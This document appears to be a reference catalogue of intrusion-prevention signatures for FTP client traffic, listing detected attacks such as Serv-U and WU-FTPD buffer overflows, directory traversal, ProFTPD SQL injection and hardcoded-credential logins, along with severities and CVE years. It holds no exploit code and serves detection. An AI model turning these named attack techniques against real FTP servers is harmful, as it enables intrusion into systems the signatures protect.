Back to top

FTP_CS-ProFTPD-SReplace-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ProFTPD detected
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ProFTPD, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-395-4219
Vulnerability: ProFTPD-FTP-Server-Telnet-IAC-Stack-Buffer-Overflow
Description:
Back to top

FTP_CS-ProFTPD-User-SQL-Injection

About this situation: Username SQL Injection allows unauthorized login
Context: FTP Client Stream
Severity: 10
Tags: Linux, Any Hardware, ProFTPD, CVE2009, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-206-2032
Last changed: sgpkg-ips-378-4219
Vulnerability: FTP-ProFTPD-User-SQL-Injection
Description:
Back to top

FTP_CS-Retr-Directory-Traversal

About this situation: Directory Traversal Detection
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2004, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-249-3038
Last changed: sgpkg-ips-249-3038
Vulnerability: Microsoft-Internet-Explorer-FTP-Client-Directory-Traversal
Description:
Back to top

FTP_CS-Rhino-Software-Serv-U-FTP-Server-RNTO-Command-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Rhino Software Serv-U FTP Server detected
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Serv-U FTP Server, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-420-4219
Vulnerability: Rhino-Software-Serv-U-FTP-Server-RNTO-Command-Directory-Traversal
Description:
Back to top

FTP_CS-Root-Login-Attempt

About this situation: Root FTP login attempt detected
Context: FTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic FTP server, Any Operating System not specific, Generic FTP server not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-183-2032
Last changed: sgpkg-ips-183-2032
Description:
Back to top

FTP_CS-Samsung-Data-Manager-Default-Root-Password

About this situation: An attempt to use default root password in Samsung Data Manager detected
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samsung Data Manager, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: Samsung-Data-Manager-Default-Root-Password
Description:
Back to top

FTP_CS-Schneider-Electric-Ethernet-Module-Hardcoded-Credentials

About this situation: An attempt to use Schneider Electric Ethernet Module hardcoded credentials detected
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric Ethernet Module, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Schneider-Electric-Ethernet-Module-Multiple-Services-Hardcoded-Credentials
Description:
Back to top

FTP_CS-Serv-U-Cwd-BOF

About this situation: Serv-U FTP Server Buffer Overflow
Context: FTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, Serv-U FTP Server, CVE1999, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-Serv-U-FTP-Server-Buffer-Overflow
Description:
Back to top

FTP_CS-Serv-U-Directory-Traversal

About this situation: Directory traversal attempt ..%20 detected
Context: FTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Serv-U FTP Server, CVE2001, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-Serv-U-Directory-Traversal
Description:
Back to top

FTP_CS-Serv-U-FTP-Server-Command-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Rhino Software Serv-U FTP Server detected
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Serv-U FTP Server, CVE2004, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-370-4219
Vulnerability: Serv-U-FTP-Server-Command-Buffer-Overflow
Description:
Back to top

FTP_CS-Serv-U-List-Parameter-Buffer-Overrun

About this situation: An attempt to exploit a vulnerability in Rhino Software Serv-U FTP Server detected
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Serv-U FTP Server, CVE2004, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-414-4219
Vulnerability: Serv-U-List-Parameter-Buffer-Overrun
Description:
Back to top

FTP_CS-Serv-U-MDTM-Command-Buffer-Overflow-1

About this situation: Serv-U MDTM command buffer overflow
Context: FTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, Serv-U FTP Server, CVE2004, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-354-4219
Vulnerability: FTP-Serv-U-MDTM-Command-Buffer-Overflow
Description:
Back to top

FTP_CS-Serv-U-MDTM-Timezone-Buffer-Overflow

About this situation: Serv-U MDTM command buffer overflow
Context: FTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Serv-U FTP Server, CVE2004, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-370-4219
Vulnerability: FTP-Serv-U-MDTM-Command-Buffer-Overflow
Description:
Back to top

FTP_CS-Serv-U-Site-Chmod-Command-Buffer-Overflow-1

About this situation: Serv-U SITE CHMOD command buffer overflow
Context: FTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, Serv-U FTP Server, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: FTP-Serv-U-Site-Chmod-Command-Buffer-Overflow
Description:
Back to top

FTP_CS-Serv-U-Site-Chmod-Command-Buffer-Overflow-2

About this situation: Serv-U SITE CHMOD command buffer overflow
Context: FTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, Serv-U FTP Server, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: FTP-Serv-U-Site-Chmod-Command-Buffer-Overflow
Description:
Back to top

FTP_CS-Serv-U-Site-Chmod-Command-Buffer-Overflow-3

About this situation: Serv-U SITE CHMOD command buffer overflow
Context: FTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, Serv-U FTP Server, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: FTP-Serv-U-Site-Chmod-Command-Buffer-Overflow
Description:
Back to top

FTP_CS-Serv-U-Site-Chmod-Command-Buffer-Overflow-4

About this situation: Serv-U SITE CHMOD command buffer overflow
Context: FTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, Serv-U FTP Server, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: FTP-Serv-U-Site-Chmod-Command-Buffer-Overflow
Description:
Back to top

FTP_CS-Serv-U-Site-Chmod-Command-Buffer-Overflow-5

About this situation: Serv-U SITE CHMOD command buffer overflow
Context: FTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, Serv-U FTP Server, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: FTP-Serv-U-Site-Chmod-Command-Buffer-Overflow
Description:
Back to top

FTP_CS-Serv-U-Stou-Command-DoS

About this situation: Denial of service attempt against Serv-U FTP server via STOU command
Context: FTP Client Stream
Severity: 2
Tags: Windows, Any Hardware, Serv-U FTP Server, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Serv-U-Stou-Command-DoS
Description:
Back to top

FTP_CS-Shared-Variables-For-Client-Stream-Context

About this situation: This fingerprint sets shared variables
Context: FTP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-99-1314
Last changed: sgpkg-ips-1794-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

FTP_CS-Shell-Command-Execution

About this situation: Attempt to execute shell commands
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-441-4219
Last changed: sgpkg-ips-441-4219
Vulnerability: FTP-Server-Shell-Command-Execution
Description:
Back to top

FTP_CS-Site-Exec

About this situation: Site exec format string vulnerability exploit
Context: FTP Client Stream
Severity: 10
Tags: SCO, Linux, FreeBSD, Any Hardware, Generic FTP server, WU-FTPD, CVE2000, Linux not specific, FreeBSD not specific, Generic FTP server not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-360-4219
Vulnerability: WU-FTPD-Site-Exec-Format-String-Vulnerability
Description: This fingerprint matches on site exec command that has % as arguments. % chars are required in exploiting format string vulnerabilitites. Attack Host: $([[$LN_SRC]]/ipv4) Target Host: $([[$LN_DST]]/ipv4) Target Port: $([[$LN_DPORT]])
Back to top

FTP_CS-Site-Exec-7350wu

About this situation: SITE EXEC format strings attack detected
Context: FTP Client Stream
Severity: 10
Tags: Linux, FreeBSD, x86, WU-FTPD, CVE2000, Linux not specific, FreeBSD not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-250-3038
Vulnerability: WU-FTPD-Site-Exec-Format-String-Vulnerability
Description:
Back to top

FTP_CS-Site-Exec-FreeBSD

About this situation: Site Exec against WU-FTPD on FreeBSD
Context: FTP Client Stream
Severity: 10
Tags: FreeBSD, x86, WU-FTPD, CVE2000, FreeBSD not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: WU-FTPD-Site-Exec-Format-String-Vulnerability
Description: The tools exploits WU-FTPD on x86 FreeBSD platforms. Attack Host: $([[$LN_SRC]]/ipv4) Target Host: $([[$LN_DST]]/ipv4) Target Port: $([[$LN_DPORT]])
Back to top

FTP_CS-Site-Exec-FreeBSD-WU-FTPD

About this situation: Site Exec against WU-FTPD on x86 FreeBSD
Context: FTP Client Stream
Severity: 7
Tags: FreeBSD, Any Hardware, WU-FTPD, CVE2000, FreeBSD not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: WU-FTPD-Site-Exec-Format-String-Vulnerability
Description: CVE References: CVE-2000-0573
Back to top

FTP_CS-Site-Exec-Lnx-Wu2600

About this situation: Site Exec Buffer Overflow against WU-FTPD on Linux (wuftpd2600.c)
Context: FTP Client Stream
Severity: 10
Tags: Linux, x86, WU-FTPD, CVE2000, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: WU-FTPD-Site-Exec-Format-String-Vulnerability
Description: The tools exploit WU-FTPD on x86 Linux platforms. Attack Host: $([[$LN_SRC]]/ipv4) Target Host: $([[$LN_DST]]/ipv4) Target Port: $([[$LN_DPORT]])
Back to top

FTP_CS-Site-Exec-Solaris-Sparc

About this situation: Site Exec against WU-FTPD on Solaris Sparc (HERT)
Context: FTP Client Stream
Severity: 10
Tags: Solaris, Sparc, WU-FTPD, CVE2000, Solaris not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: WU-FTPD-Site-Exec-Format-String-Vulnerability
Description: CVE References: CVE-2000-0573
Back to top

FTP_CS-Site-Exec-WU-FTPD-Bobek

About this situation: Site Exec against WU-FTPD on x86 FreeBSD or Linux (bobek.c)
Context: FTP Client Stream
Severity: 10
Tags: Linux, FreeBSD, Any Hardware, WU-FTPD, CVE2000, Linux not specific, FreeBSD not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-250-3038
Vulnerability: WU-FTPD-Site-Exec-Format-String-Vulnerability
Description: This fingerprint will most likely catch some other attacks against CVE-2000-0573. Attack Host: $([[$LN_SRC]]/ipv4) Target Host: $([[$LN_DST]]/ipv4) Target Port: $([[$LN_DPORT]])
Back to top

FTP_CS-Site-Exec-WU-Lnx

About this situation: WU-FTPD wu-lnx format string overflow
Context: FTP Client Stream
Severity: 10
Tags: Linux, x86, WU-FTPD, CVE2000, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: WU-FTPD-Site-Exec-Format-String-Vulnerability
Description: The tool exploits x86 Linux WU-FTPD - 2.6.0(1) in RH6.2. Attack Host: $([[$LN_SRC]]/ipv4) Target Host: $([[$LN_DST]]/ipv4) Target Port: $([[$LN_DPORT]])
Back to top

FTP_CS-Snake-Keylogger-Infection-Traffic

About this situation: Snake Keylogger infection traffic was detected
Context: FTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1377-5242
Vulnerability: Snake-Keylogger-Infection-Traffic
Description:
Back to top

FTP_CS-Stor-To-Rhost

About this situation: A STOR command tried to write into .rhost system file
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-395-4219
Description:
Back to top

FTP_CS-Suspicious-Filename

About this situation: A suspicious filename detected
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic FTP server, Any Operating System not specific, Generic FTP server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-350-4219
Last changed: sgpkg-ips-350-4219
Vulnerability: Suspicious-Filename
Description:
Back to top

FTP_CS-Suspicious-Format-String-Modifiers-In-FTP-Command

About this situation: Suspicious format string modifiers in FTP command detected
Context: FTP Client Stream
Severity: 7
Tags: Windows, x86, DreamFTP, CVE2004, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-25-1210
Last changed: sgpkg-ips-445-4219
Vulnerability: FTP-DreamFTP-Username-Format-String-System-Compromise
Description:
Back to top

FTP_CS-System-AccountLogin-Attempt

About this situation: Root FTP login attempt detected
Context: FTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic FTP server, Any Operating System not specific, Generic FTP server not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-183-2032
Last changed: sgpkg-ips-183-2032
Description:
Back to top

FTP_CS-Telnet-Escape-Sequence

About this situation: A Telnet escape sequence detected
Context: FTP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic FTP server, Any Operating System not specific, Generic FTP server not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-637-5211
Description:
Back to top

FTP_CS-Texas-Imperial-Software-Wftpd-Buffer-Overflow

About this situation: An attempt to exploit a Texas Imperial Software Wftpd Buffer Overflow vulnerability detected.
Context: FTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, WFTPD, CVE2006, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-732-5211
Last changed: sgpkg-ips-732-5211
Vulnerability: Texas-Imperial-Software-Wftpd-Buffer-Overflow
Description:
Back to top

FTP_CS-Titan-FTP-Server-Denial-Of-Service

About this situation: An attempt to exploit a Titan FTP Server Denial Of Service vulnerability detected.
Context: FTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Titan FTP Server, CVE2008, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Vulnerability: Titan-FTP-Server-Denial-Of-Service
Description:
Back to top

FTP_CS-Tripwire-File-Name-Format-String

About this situation: An attempt to exploit a vulnerability in Tripwire detected
Context: FTP Client Stream
Severity: 7
Tags: Unix, Any Hardware, Tripwire, Open Source Tripwire, Unix not specific, Tripwire not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-419-4219
Vulnerability: Tripwire-File-Name-Format-String
Description:
Back to top

FTP_CS-Turbosoft-Turboftp-Server-Port-Command-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in TurboSoft TurboFTP detected
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, TurboFTP, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-499-5211
Vulnerability: Turbosoft-Turboftp-Server-Port-Command-Buffer-Overflow
Description:
Back to top

FTP_CS-uftpd-FTP-Server-Port-Command-Handling-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in uftpd Project uftpd detected
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, uftpd, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1503-5242
Vulnerability: uftpd-FTP-Server-Port-Command-Handling-Stack-Buffer-Overflow
Description:
Back to top

FTP_CS-Vandyke-Vshell-Server-Trigger-Command-Injection

About this situation: An attempt to exploit a vulnerability in VanDyke VShell detected
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VanDyke VShell, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1479-5242
Last changed: sgpkg-ips-1479-5242
Vulnerability: Vandyke-Vshell-Server-Trigger-Command-Injection
Description:
Back to top

FTP_CS-Very-Long-Self-Referencing-Path

About this situation: Too Long Selfreferencing Path
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-100-1314
Last changed: sgpkg-ips-991-5242
Vulnerability: FTP-Selfreferencing-Path
Description:
Back to top

FTP_CS-Victory-FTP-Server-Denial-Of-Service

About this situation: An attempt to exploit a Victory FTP Server Denial Of Service vulnerability detected.
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Victory FTP, CVE2008, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-761-5211
Last changed: sgpkg-ips-761-5211
Vulnerability: Victory-FTP-Server-Denial-Of-Service
Description:
Back to top

FTP_CS-VSFTPD-Backdoor-Command-Execution

About this situation: An attempt to exploit a VSFTPD Backdoor Command Execution vulnerability detected.
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VSFTPD, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-712-5211
Vulnerability: VSFTPD-Backdoor-Command-Execution
Description:
Back to top

FTP_CS-War-Ftpd-User-Pass-BOF

About this situation: Attempt to exploit a buffer overflow in War FTPD
Context: FTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, War FTP Daemon, CVE1999, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-13-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: War-Ftpd-User-Pass-BOF
Description:
Back to top

FTP_CS-War-Ftpd-User-Pass-BOF-2

About this situation: Attempt to exploit a buffer overflow in War FTPD
Context: FTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, War FTP Daemon, CVE1999, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-183-2032
Last changed: sgpkg-ips-249-3038
Vulnerability: War-Ftpd-User-Pass-BOF
Description:
Back to top

FTP_CS-Wftpd-Mkd-Cwd

About this situation: WFTPD Mkd Cwd buffer overflow
Context: FTP Client Stream
Severity: 10
Tags: Windows, x86, WFTPD, CVE1999, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-Wftpd-Mkd-Cwd
Description:
Back to top

FTP_CS-Win-FTP-Server-Wftpsrv.exe-List-FTP-Command-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Win FTP Server detected
Context: FTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Win FTP Server, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Win-FTP-Server-Wftpsrv.exe-List-FTP-Command-Buffer-Overflow
Description:
Back to top

FTP_CS-Windows-Any-Ftpd-Retr-Get-DoS

About this situation: Denial of service attack against Windows FTP server
Context: FTP Client Stream
Severity: 2
Tags: Windows, x86, Generic FTP server, CVE2001, Windows not specific, Generic FTP server not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-Windows-Retr-Get-Drive-Letter
Description:
Back to top

FTP_CS-Windows-G6-Path-Disclosure

About this situation: Installation path disclosure attempt against G6 FTP server
Context: FTP Client Stream
Severity: 2
Tags: Windows, x86, G6 FTP server, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-Win-G6-Dele-Rnfr-Path-Disclosure
Description:
Back to top

FTP_CS-Ws-FTP-Server-iFtpSvc-System-Compromise

About this situation: WS_FTP server SITE System Compromise
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WS_FTP Server, CVE2004, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-249-3038
Last changed: sgpkg-ips-720-5211
Vulnerability: FTP-Ws-FTP-Server-Site-iFtpSvc-Remote-Command-Execution
Description:
Back to top

FTP_CS-WS-FTP-Server-Multiple-Commands-BOF

About this situation: Attempt to exploit a buffer overflow in WS_FTP server
Context: FTP Client Stream
Severity: 7
Tags: Windows NT, Windows 2000, x86, WS_FTP Server, CVE2004, Windows NT not specific, Windows 2000 not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: WS-FTP-Server-Multiple-Commands-BOF
Description:
Back to top

FTP_CS-WS-FTP-Server-Multiple-Commands-Potential-BOF

About this situation: Attempt to exploit a buffer overflow in WS_FTP server
Context: FTP Client Stream
Severity: 7
Tags: Windows NT, Windows 2000, x86, WS_FTP Server, CVE2004, Windows NT not specific, Windows 2000 not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-395-4219
Vulnerability: WS-FTP-Server-Multiple-Commands-BOF
Description:
Back to top

FTP_CS-Ws-FTP-Server-XCRC-XMD5-XSHA1-Command-Buffer-Overflow

About this situation: WS_FTP server buffer overflow with commands XCRC,XMD5 and XSHA1
Context: FTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WS_FTP Server, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-80-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: FTP-Ws-FTP-Server-XCRC-XMD5-XSHA1-Command-Buffer-Overflow
Description:
Back to top

FTP_CS-WU-FTPD-Fnmatch-Function-Asterisk-DoS

About this situation: Attempt to cause a denial of service on WU-FTPD
Context: FTP Client Stream
Severity: 2
Tags: Unix, Any Hardware, WU-FTPD, CVE2005, Unix not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-22-1210
Last changed: sgpkg-ips-169-2032
Vulnerability: WU-FTPD-Fnmatch-Function-Asterisk-DoS
Description:
Back to top

FTP_CS-WU-FTPD-Palmetto-BOF-Admwuftpd

About this situation: Palmetto Buffer Overflow against WU-FTPD and ProFTPD on Linux x86 (ADMwuftpd)
Context: FTP Client Stream
Severity: 10
Tags: Any Operating System, x86, WU-FTPD, ProFTPD, CVE1999, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-Palmetto-BOF
Description: This fingerprint may catch also other, similar, attacks. Attack Host: $([[$LN_SRC]]/ipv4) Target Host: $([[$LN_DST]]/ipv4) Target Port: $([[$LN_DPORT]])
Back to top

FTP_CS-WU-FTPD-Palmetto-BOF-Bulba

About this situation: Palmetto Buffer Overflow against WU-FTPD and ProFTPD on Linux x86 (bulba)
Context: FTP Client Stream
Severity: 10
Tags: Any Operating System, x86, WU-FTPD, ProFTPD, CVE1999, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-Palmetto-BOF
Description: CVE References: CVE-1999-0368
Back to top

FTP_CS-WU-FTPD-Palmetto-BOF-Duke

About this situation: Palmetto Buffer Overflow against WU-FTPD and ProFTPD on Linux x86 (duke)
Context: FTP Client Stream
Severity: 10
Tags: Any Operating System, x86, WU-FTPD, ProFTPD, CVE1999, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-Palmetto-BOF
Description: However, it is possible that this fingerprint catches also other attacks against ftp servers. Attack Host: $([[$LN_SRC]]/ipv4) Target Host: $([[$LN_DST]]/ipv4) Target Port: $([[$LN_DPORT]])
Back to top

FTP_CS-WU-FTPD-Palmetto-BOF-Ftpwarez

About this situation: Palmetto Buffer Overflow against WU-FTPD and ProFTPD (ftpwarez.c)
Context: FTP Client Stream
Severity: 10
Tags: Any Operating System, x86, WU-FTPD, ProFTPD, CVE1999, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-Palmetto-BOF
Description: CVE References: CVE-1999-0368
Back to top

FTP_CS-WU-FTPD-Palmetto-BOF-W00f

About this situation: Palmetto Buffer Overflow against WU-FTPD and ProFTPD on Linux x86 (w00f.c)
Context: FTP Client Stream
Severity: 10
Tags: Any Operating System, x86, WU-FTPD, ProFTPD, CVE1999, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-169-2032
Vulnerability: FTP-Palmetto-BOF
